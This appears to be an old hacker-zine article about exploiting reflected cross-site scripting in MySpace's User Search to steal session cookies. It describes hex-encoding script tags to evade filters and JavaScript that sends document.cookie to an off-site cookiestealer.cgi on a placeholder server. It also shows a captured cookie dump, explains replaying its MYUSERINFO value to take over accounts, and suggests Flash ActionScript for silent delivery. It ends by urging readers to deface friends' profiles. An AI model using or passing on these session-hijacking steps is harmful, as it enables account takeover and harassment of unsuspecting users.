XSS'ing MySpace.com
by FxYxIxE
So you've probably been on, have seen, or have your own part of the biggest trend of recent Internet times: MySpace.com.
It figures that with such a massive site that uses so many different types of web applications that it will be vulnerable to multiple Cross-Site Scripting attacks.
If you're not familiar with Cross-Site Scripting (XSS or CSS, not to be confused with Cascading Style Sheets), or have forgotten about them, check out the Wikipedia entry about them. Then meander on over to PacketStorm to get some examples on other sites to further understand the concept.
Basically what it enables one to do (in this case) is inject JavaScript into the URL of a site that uses a web application.
Which means you can also put it directly into a clickable hyperlink. The scope of this article will only cover using JavaScript (encoded) directly in the hyperlink to exploit the vulnerabilities.
There are other ways that could work very well without having to encode the JavaScript, such as ActionScript in Flash, which I will touch upon again later.
There are various different places in MySpace in which JavaScript can be injected.
For example the "User Search" web application URL and things like that. Most of them will need to converted and encoded into hex or some other characters. Usually not all of the JavaScript needs to be encoded, only the <script>-type tags. This encoding enables one to bypass MySpace's filters which attempt to avoid XSS. The wonderful job that it does...
Let's move on to some examples and some explanations.
First of all, sign up for a MySpace account. You will need it if you want this to work. By the time this is published, this example may have already been fixed by MySpace. I do not wish to guide any script kiddies step-by-step into this, so you will be forced to find your own XSS vulnerabilities by using the information shown below. You could also use any method you prefer, possibly a vulnerability scanner.
Now here is the good stuff, the code, the implemented link, and the explanation of such. The vulnerability lies within the "User Search" application (a.k.a. Browse):
As you can see from the link above, I have much of the link encoded in hex in order to evade MySpace's filters.
Below is the link without the encoding:
As you can see, the XSS actually starts after the: searchrequest=
The JavaScript is injected directly into the link. It points to the document location which is just a test site of: http://www.yourserver.com/cgi-local/cookiestealer.cgi
Then the JavaScript tells the CGI script to add the current document.cookie to the log file which is stated within the CGI script.
Once you have successfully embedded your JavaScript and you have retrieved someone's cookie, open up the logger file you stated in the CGI script, and you will see something along the lines of the following. They do vary from user to user, but you only need one part of it:
AGEFROM=16; AGETO=20; AREASEARCH=0; COLLAPSE=0; COUNTRY=US; DISTANCE=20; GENDER=W; NODETAIL=1; ORDERBY=3; PHOTOS=1; POSTAL=44130; STATUS=; AUTOSONGPLAY=0; MYSPACE=myspace; \ MSCOUNTRY=US; REVSCI=1; MYUSERINFO=MIHgBgorBEgEAYI3WAOxoTHRMIHOBgorBgGEEAYI3WAMBoIG/MIG8AGMCAAECAMYDAgIAWAQIR1uKtOZHL4MEETOKAKkZuvhepPPPHsFnig4kgZD4WwsnTYAIBTldoEtwRTERCWTNHR \ IEUZD00dt0q1g4XATMn3zjJ4LJmto9ZDDw5U3trmzU0pOvewnDjCZS0b325UH2VIVXiEONNTIX4+1L/aunAL3uiz/J45+7iWGoLjgu/1luaMZZ677zgiZ1/wuCtwV3CRDNS/VEFO+t+KVREQOMD7bb6hA37EDUSXdADxVITVSN64=; \ DERDB=ZG9tYWluPXlhaG9vInRsZD1jb20mc21va2VyPTAmc2V4CHI1Z7OxInV0eXB1PTEmcmVsaWwdpb5pZD0wInTI1Z21vbj0zOSZwbh3NO0VWxIb2RIPTOOMTMwiImlhcml0OYWxzdGFOdXM9UyZpbmNVvbwVpZD0xImhlawdodD0 \ xODAmZ2VuZGVyPU0mZnIpZwikez0wJmV0aGh5py2i1kPTgmYWdlPTE4ImJIvZHIOeXBI1aWwOIMIZjaGlsZHTlbmlkPTEmMV291lbnRyeT1VUyZkYXRpbmc9MCikcmlua2VvVyPTHMZWRIV2F0aWgwaWO9MO==; \ LASTUSERCLICK={ts '2005-12-20 00:49:13'}; FRNDIDxr2g=2721774The section you are looking for in this is the MYUSERINFO portion, which in this case is:
To test to find your own XSS vulnerabilities in MySpace you can try to use this simple example link to see if your JavaScript is working (everything after the name= portion is the test):
http://www.vulnerablewebsite.com/users/search=12345&name=<script>alert("Hello!");</script>If it worked, an alert box will pop up with your message of "Hello!" in it.
Now to move on to what you can do with this newfound cookie and information.
Note: You will need to write your own CGI script that is used in the above example. The script basically logs document.cookie to a log file. You can easily find a tutorial or even a completed one using Google.
Hopefully by now you can tell what you can do with such a vulnerability, but if you cannot here's the brunt of it. You probably noticed my JavaScript was telling an off-site CGI script to retrieve document.cookie.
With someone else's current session cookie from MySpace, you could effectively hijack their MySpace account and session. With IE, Mozilla, or any browser you prefer (that has the correct plug-ins), you can copy the user's MYUSERINFO portion of their cookie into your current cookie.
After you do this, all you have to do is refresh the home page of your current MySpace account, and voilà, you are logged in as the user. Note that the user must be online in order for you to log in as them, unless you capture the cookie and set it to never expire, and have the means to implement that.
With the link you generated using JavaScript and the MySpace XSS vulnerable web application, you can now send it to your friends (or enemies) and if they're online and gullible enough (try a Bulletin), you can instantly watch their cookie appear in your cookie log file, and then proceed to log in as them.
As stated before, there are ways to get the link and JavaScript to execute without the user doing more than visiting a page on MySpace they would normally visit, such as their front page, a private message, or your MySpace page. This is accomplished by embedding the "evil" JavaScript and XSS info into a Flash document containing ActionScript. MySpace only blocks the <embed> tag on certain parts of its site.
Note that the cookie you have just stolen also contains the user's password. It is encrypted... so you really got more than just their session. That is if you know what to do with it. But that is an entire article in itself...
Now go have some fun posting obscene pictures on your friends' MySpace.